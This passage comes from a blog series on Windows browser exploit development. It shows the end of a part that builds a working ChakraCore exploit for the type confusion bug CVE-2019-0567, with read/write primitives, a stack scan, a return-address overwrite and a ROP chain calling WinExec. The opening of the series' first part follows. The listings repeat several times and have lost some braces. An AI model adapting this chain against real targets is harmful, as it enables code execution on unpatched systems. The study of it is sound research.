        print("[+] Stack address 0x" + hex(stackLeak[1]) + hex(stackLeak[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));

        // Increment the counter
        counter += 0x8;


As we can see above, we are going to scan the stack, up through 0x10000 bytes (which is just a random arbitrary value). It is worth noting that the stack grows β€œdownwards” on x64-based Windows systems. Since we have leaked the stack limit, this is technically the β€œlowest” address our stack can grow to. The stack base is known as the upper limit, to where the stack can also not grow past. This can be examined more thoroughly by referencing our !teb command output previously seen.

For instance, let’s say our stack starts at the address 0xf7056ff000 (based on the above image). We can see that this address is within the bounds of the stack base and stack limit. If we were to perform a push rax instruction to place RAX onto the stack, the stack address would then β€œgrow” to 0xf7056feff8. The same concept can be applied to function prologues, which allocate stack space by performing sub rsp, 0xSIZE. Since we leaked the β€œlowest” the stack can be, we will scan β€œupwards” by adding 0x8 to our counter after each iteration.

Let’s now run our updated exploit.js in a cmd.exe session without any debugger attached, and output this to a file.

As we can see, we received an access denied. This actually has nothing to do with our exploit, except that we attempted to read memory that is invalid as a result of our loop. This is because we set an arbitrary value of 0x10000 bytes to read - but all of this memory may not be resident at the time of execution. This is no worry, because if we open up our results.txt file, where our output went, we can see we have plenty to work with here.

Scrolling down a bit in our results, we can see we have finally reached the location on the stack with return addresses and other data.

What we do next is a β€œtrial-and-error” approach, where we take one of the 0x7fff addresses, which we know is a standard user-mode address that is from a loaded module backed by disk (e.g. ntdll.dll) and we take it, disassemble it in WinDbg to determine if it is a return address, and attempt to use it.

I have already gone through this process, but will still show you how I would go about it. For instance, after paring results.txt I located the address 0x7fff25c78b0 on the stack. Again, this could be another address with 0x7fff that ends in a ret.

After seeing this address, we need to find out if this is an actual ret instruction. To do this, we can execute our exploit within WinDbg and set a break-on-load breakpoint for chakracore.dll. This will tell WinDbg to break when chakracore.dll is loaded into the process space.

After chakracore.dll is loaded, we can disassemble our memory address and as we can see - this is a valid ret address.

What this means is at some point during our code execution, the function chakracore!JsRun is called. When this function is called, chakracore!JsRun+0x40 (the return address) is pushed onto the stack. When chakracore!JsRun is done executing, it will return to this instruction. What we will want to do is first execute a proof-of-concept that will overwrite this return address with 0x4141414141414141. This means when chakracore!JsRun is done executing (which should happen during the lifetime of our exploit running), it will try to load its return address into the instruction pointer - which will have been overwritten with 0x4141414141414141. This will give us control of the RIP register! Once more, to reiterate, the reason why we can overwrite this return address is because at this point in the exploit (when we scan the stack), chakracore!JsRun’s return address is on the stack. This means between the time our exploit is done executing, as the JavaScript will have been run (our exploit.js), chakracore!JsRun will have to return execution to the function which called it (the caller). When this happens, we will have corrupted the return address to hijack control-flow into our eventual ROP chain.

Now we have a target address, which is located 0x1768bc0 bytes away from chakrecore.dll.

With this in mind, we can update our exploit.js to the following, which should give us control of RIP.


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop

        // Increment the counter if we didn't find our target return address
        counter += 0x8;

    // When execution reaches here, stackLeak+counter contains the stack address with the return address we want to overwrite
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);


Let’s run this updated script in the debugger directly, without any breakpoints.

After running our exploit, we can see we encounter an access violation! We can see a ret instruction is attempting to be executed, which is attempting to return execution to the ret address we have overwritten! This is likely a result of our JsRun function invoking a function or functions which eventually return execution to the ret address of our JsRun function which we overwrote. If we take a look at the stack, we can see the culprit of our access violation - ChakraCore is trying to return into the address 0x4141414141414141 - an address which we control! This means we have successfully controlled program execution and RIP!

All there is now to do is write a ROP chain to the stack and overwrite RIP with our first ROP gadget, which will call WinExec to spawn calc.exe

Code Execution

With complete stack control via our arbitrary write primitive plus stack leak, and with control-flow hijacking available to us via a return address overwrite - we now have the ability to induce a ROP payload. This is, of course, due to the advent of DEP. Since we know where the stack is at, we can use our first ROP gadget in order to overwrite the return address we previously overwrote with 0x4141414141414141. We can use the rp++ utility in order to parse the .text section of chakracore.dll for any useful ROP gadgets. Our goal (for this part of the blog series) will be to invoke WinExec. Note that this won’t be possible in Microsoft Edge (which we will exploit in part three) due to the mitigation of no child processes in Edge. We will opt for a Meterpreter payload for our Edge exploit, which comes in the form of a reflective DLL to avoid spawning a new process. However, since CharkaCore doesn’t have these constraints, let’s parse chakracore.dll for ROP gadgets and then take a look at the WinExec prototype.

Let’s use the following rp++ command: rp-win-x64.exe -f C:\PATH\TO\ChakraCore\Build\VcBuild\x64_debug\ChakraCore.dll -r > C:\PATH\WHERE\YOU\WANT\TO\OUTPUT\gadgets.txt:

ChakraCore is a very large code base, so gadgets.txt will be decently big. This is also why the rp++ command takes a while to parse chakracore.dll. Taking a look at gadgets.txt, we can see our ROP gadgets.

Moving on, let’s take a look at the prototype of WinExec.

As we can see above, WinExec takes two parameters. Because of the __fastcall calling convention, the first parameter needs to be stored in RCX and the second parameter needs to be in RDX.

Our first parameter, lpCmdLine, needs to be a string which contains the contents of calc. At a deeper level, we need to find a memory address and use an arbitrary write primitive to store the contents there. In other works, lpCmdLine needs to be a pointer to the string calc.

Looking at our gadgets.txt file, let’s look for some ROP gadgets to help us achieve this. Within gadgets.txt, we find three useful ROP gadgets.

0x18003e876: pop rax ; ret ; \x26\x58\xc3 (1 found)
0x18003e6c6: pop rcx ; ret ; \x26\x59\xc3 (1 found)
0x1800d7ff7: mov qword [rcx], rax ; ret ; \x48\x89\x01\xc3 (1 found)

Here is how this will look in terms of our ROP chain:

pop rax ; ret
<0x636c6163> (calc in hex is placed into RAX)

pop rcx ; ret
<pointer to store calc> (pointer is placed into RCX)

mov qword [rcx], rax ; ret (fill pointer with calc)

Where we have currently overwritten our return address with a value of 0x4141414141414141, we will place our first ROP gadget of pop rax ; ret there to begin our ROP chain. We will then write the rest of our gadgets down the rest of the stack, where our ROP payload will be executed.

Our previous three ROP gadgets will place the string calc into RAX, the pointer where we want to write this string into RCX, and then a gadget used to actually update the contents of this pointer with the string.

Let’s update our exploit.js script with these ROP gadgets (note that rp++ can’t compensate for ASLR, and essentially computes the offset from the base of chakracore.dll. For example, the pop rax gadget is shown to be at 0x18003e876. What this means is that we can actually find this gadget at chakracore_base + 0x3e876.)


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop

        // Increment the counter if we didn't find our target return address
        counter += 0x8;

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);



You’ll notice the address we are placing in RCX, via pop rcx, is β€œan empty address in .data of chakracore.dll”. The .data section of any PE is generally readable and writable. This gives us the proper permissions needed to write calc into the pointer. To find this address, we can look at the .data section of chakracore.dll in WinDbg with the !dh command.

Let’s open our exploit.js in WinDbg again via ch.exe and WinDbg and set a breakpoint on our first ROP gadget (located at chakracore_base + 0x3e876) to step through execution.

Looking at the stack, we can see we are currently executing our ROP chain.

Our first ROP gadget, pop rax, will place calc (in hex representation) into the RAX register.

After execution, we can see the ret from our ROP gadget takes us right to our next gadget - pop rcx, which will place the empty .data pointer from chakracore.dll into RCX.

This brings us to our next ROP gadget, the mov qword ptr [rcx], rax ; ret gadget.

After execution of the ROP gadget, we can see the .data pointer now contains the contents of calc - meaning we now have a pointer we can place in RCX (it technically is already in RCX) as the lpCmdLine parameter.

Now that the first parameter is done - we only have two more steps left. The first is the second parameter, uCmdShow (which just needs to be set to 0). The last gadget will pop the address of kernel32!WinExec. Here is how this part of the ROP chain will look.

pop rdx ; ret
<0 as the second parameter> (placed into RDX)

pop rax ; ret
<WinExec address> (placed into RAX)

jmp rax (call kernel32!WinExec)

The above gadgets will fill RDX with our last parameter, and then place WinExec into RAX. Here is how we update our final script.


    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop

        // Increment the counter if we didn't find our target return address
        counter += 0x8;

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);


Before execution, we can find the address of kernel32!WinExec by computing the offset in WinDbg.

Let’s again run our exploit in WinDbg and set a breakpoint on the pop rdx ROP gadget (located at chakracore_base + 0x40802)

After the pop rdx gadget is hit, we can see 0 is placed in RDX.

Execution then redirects to the pop rax gadget.

We then place kernel32!WinExec into RAX and execute the jmp rax gadget to jump into the WinExec function call. We can also see our parameters are correct (RCX points to calc and RDX is 0.

We can now see everything is in order. Let’s close our of WinDbg and execute our final exploit without any debugger. The final code can be seen below.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop

        // Increment the counter if we didn't find our target return address
        counter += 0x8;

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax


As we can see, we achieved code execution via type confusion while bypassing ASLR, DEP, and CFG!


As we saw in part two, we took our proof-of-concept crash exploit to a working exploit to gain code execution while avoiding exploit mitigations like ASLR, DEP, and Control Flow Guard. However, we are only executing our exploit in the ChakraCore shell environment. When we port our exploit to Edge in part three, we will need to use several ROP chains (upwards of 11 ROP chains) to get around Arbitrary Code Guard (ACG).

I will see you in part three! Until then.

Peace, love, and positivity :-)

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 1)

11 March 2022 at 00:00


Browser exploitation - it has been the bane of my existence for quite some time now. A while ago, I did a write-up on a very trivial use-after-free vulnerability in an older version of Internet Explorer. This left me longing for more, as ASLR for instance was non-issue. Also, use-after-free bugs within the DOM have practically been mitigated with the advent of MemGC. Additional mitigations, such as Control Flow Guard (CFG), were also not present.

In the name of understanding more modern browser exploitation (specifically Windows-based exploitation), I searched and scoured the internet for resources. I constantly picked the topic up, only to set it down again. I simply just β€œdidn’t get it”. This was for a variety of factors, including browser exploitation being a very complex issue, with research on the topic being distributed accordingly. I’ve done my fair share of tinkering in the kernel, but browsers were a different beast for me.

Additionally, I found almost no resources that went from start to finish on more β€œmodern” exploits, such as attacking Just-In-Time (JIT) compilers specifically on Windows systems. Not only that, almost all resources available online target Linux operating systems. This is fine, from a browser primitive perspective. However, when it comes to things like exploit controls such as CFG, to actual exploitation primitives, this can be highly dependent on the OS. As someone who focuses exclusively on Windows, this led to additional headache and disappointment.

I recently stumbled across two resources: the first being a Google Project Zero issue for the vulnerability we will be exploiting in this post, CVE-2019-0567. Additionally, I found an awesome writeup on a β€œsister” vulnerability to CVE-2019-0539 (which was also reported by Project Zero) by Perception Point.

The Perception Point blog post was a great read, but I felt it was more targeted at folks who already have fairly decent familiarity with exploit primitives in the browser. There is absolutely nothing wrong with this, and I think this is still makes for an excellent blog post that I would highly recommend reading if you’ve done any kind of browser vulnerability research before. However, for someone in my shoes that has never touched JIT compiler vulnerability research in the browser space, there was a lack of knowledge I had to make up for, not least because the post actually just ended on achieving the read/write primitive and left code execution to the reader.

There is also other prerequisite knowledge needed, such as why does JIT compilation even present an attack surface in the first place? How are JavaScript objects laid out in memory? Since JavaScript values are usually 32-bit, how can that be leveraged for 64-bit exploitation? How do we actually gain code execution after obtaining a read/write primitive with DEP, ASLR, CFG, Arbitrary Code Guard (ACG), no child processes, and many other mitigations in Edge involved? These are all questions I needed answers to. To share how I went about addressing these questions, and for those also looking to get into browser exploitation, I am releasing a three part blog series on browser exploitation.

Part one (this blog) will go as follows:

  1. Configuring and building up a browser exploitation environment
  2. Understanding JavaScript objects and their layout in memory (ChakraCore/Chakra)
  3. CVE-2019-0567 root cause analysis and attempting to demystify type confusion bugs in JIT compilers

Part two will include:

  1. Going from crash to exploit (and dealing with ASLR, DEP, and CFG along the way) in ChakraCore
  2. Code execution

Part three, lastly, will deconstruct the following topics:

  1. Porting the exploit to Microsoft Edge (Chakra-based Edge)
  2. Bypassing ACG, using a now-patched CVE
  3. Code execution in Edge

There are also a few limitations you should be aware of as well:

  1. In this blog series we will have to bypass ACG. The bypass we will be using has been mitigated as of Windows 10 RS4.
  2. I am also aware of Intel Control-Flow Enforcement Technology (CET), which is a mitigation that now exists (although it has yet to achieve widespread adoption). The version of Edge we are targeting doesn’t have CET.
